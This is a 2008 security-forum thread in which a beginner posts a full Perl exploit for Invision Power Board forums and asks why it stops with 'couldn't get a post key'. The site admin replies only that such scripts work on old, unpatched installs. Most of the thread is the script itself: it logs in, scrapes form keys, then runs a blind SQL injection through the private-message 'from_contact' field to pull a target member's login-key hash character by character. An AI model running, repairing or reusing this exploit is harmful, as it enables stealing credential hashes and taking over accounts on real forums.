 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
i need some help guys. |
 |
 Posted: Wed Dec 03, 2008 7:21 pm |
 |
|
| silverninja |
| Beginner |
 |
|
| Joined: Dec 03, 2008 |
| Posts: 3 |
|
|
|
 |
|
 |
|
sup guys, i have been looking throw alot of tutorials throw the internet for the past few weeks, and im really getting stuck here, i don't wanna hack no one, but i just wanna learn how to do these stuff.
i created a new ipbfree forum, and im trying to hack it (trying to find the admin password that i have created) i just wanna know the way to do it, here is what i did so far and the stuff that i got.
ok i got active perl 5
i got the ipb.ip expoilt
here is the code:
-------------------------------------------
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;
# variables
my $login_page = '?act=Login&CODE=01';
my $pm_page = '?act=Msg&CODE=04';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $hash = '';
my $need_null = 0;
my $i;
my $j;
my @charset = ('0' .. '9', 'a' .. 'f');
my %form = (act => 'Msg',
CODE => '04',
MODE => '01',
OID => '',
removeattachid => '',
msg_title => 'asdf',
bbmode => 'normal',
ffont => 0,
fsize => 0,
fcolor => 0,
LIST => ' LIST ',
helpbox => 'Insert Monotype Text (alt + p)',
tagcount => 0,
Post => 'jkl');
# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";
# get user input
print 'IPB Forum URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty; # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty; # to turn it back on
print "\n" if $stty;
print 'Target userid ? '; # it'll say next to one of their posts
chomp (my $tid = <STDIN>);
# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());
# reset tries
$tries = 5;
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
# get ourselves a post_key (and an auth_key too with newer versions)
do {
$resp = $ua->get ($base_url . $pm_page);
} while ($tries-- && !$resp->is_success());
# reset tries
$tries = 5;
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#)
{
$form{post_key} = $1;
} else {
die "Error: couldn't get a post key.\n";
}
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#)
{
$form{auth_key} = $1;
}
# turn off buffering so chars in the hash show up straight away
$| = 1;
print "\nAttempting to extract password hash from database...\n ";
OFFSET:
for ($i = 0; $i < 32; ++$i) {
CHAR:
for ($j = 0; $j < @charset; ++$j) {
# reset tries
$tries = 5;
print "\x08", $charset[$j];
# build sql injection
$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
. (join (',', map {ord} split ('', $user))) . ') FROM '
. 'ibf_members WHERE id = ' . $tid . ' AND MID('
. 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('
. ord ($charset[$j]) . ')';
$form{from_contact} = $sql;
$resp = $ua->post ($base_url . $post_pm_page, \%form,
referer => $base_url . $pm_page);
if (!$resp->is_success()) {
die "\nError: " . $resp->status_line
. "\n" if (!$tries);
--$tries;
redo;
}
if ($resp->content =~ /sql error/i) {
if ($need_null) {
die "Error: SQL error.\n";
} else {
$need_null = 1;
redo OFFSET;
}
} elsif ($resp->content !~ /there is no such member/i) {
# we have a winner !
print ' ';
next OFFSET;
}
}
# uh oh, something went wrong
die "\nError: couldn't get a char for offset $i\n";
}
print "\x08 \x08\nHit enter to quit.\n";
<STDIN>;
----------------------------------
ok here is what i do,
in this screen shot is everything i do, i end up with this error "couldn't get a post key"
why is that? i need your help guys, so can someone help me and show me how to fix this please.
my forum url is da2.ipbfree.net u can log or register if u want, as i don't use this board no more.
i just want to learn these stuff, so can someone lead me to the right direction plz.
thanks. |
|
|
|
|
|
|
|
|
| Posted: Fri Dec 05, 2008 1:22 pm |
|
|
| silverninja |
| Beginner |
|
|
| Joined: Dec 03, 2008 |
| Posts: 3 |
|
|
|
|
|
|
|
| bump... can someone give me answer please. |
|
|
|
|
| Posted: Fri Dec 05, 2008 2:40 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You can't hack ipbfree forums with such exploit scripts. This will work only against old and unpatched installations. And ipbfree is well protected  |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 63
Members: 0
Total: 63
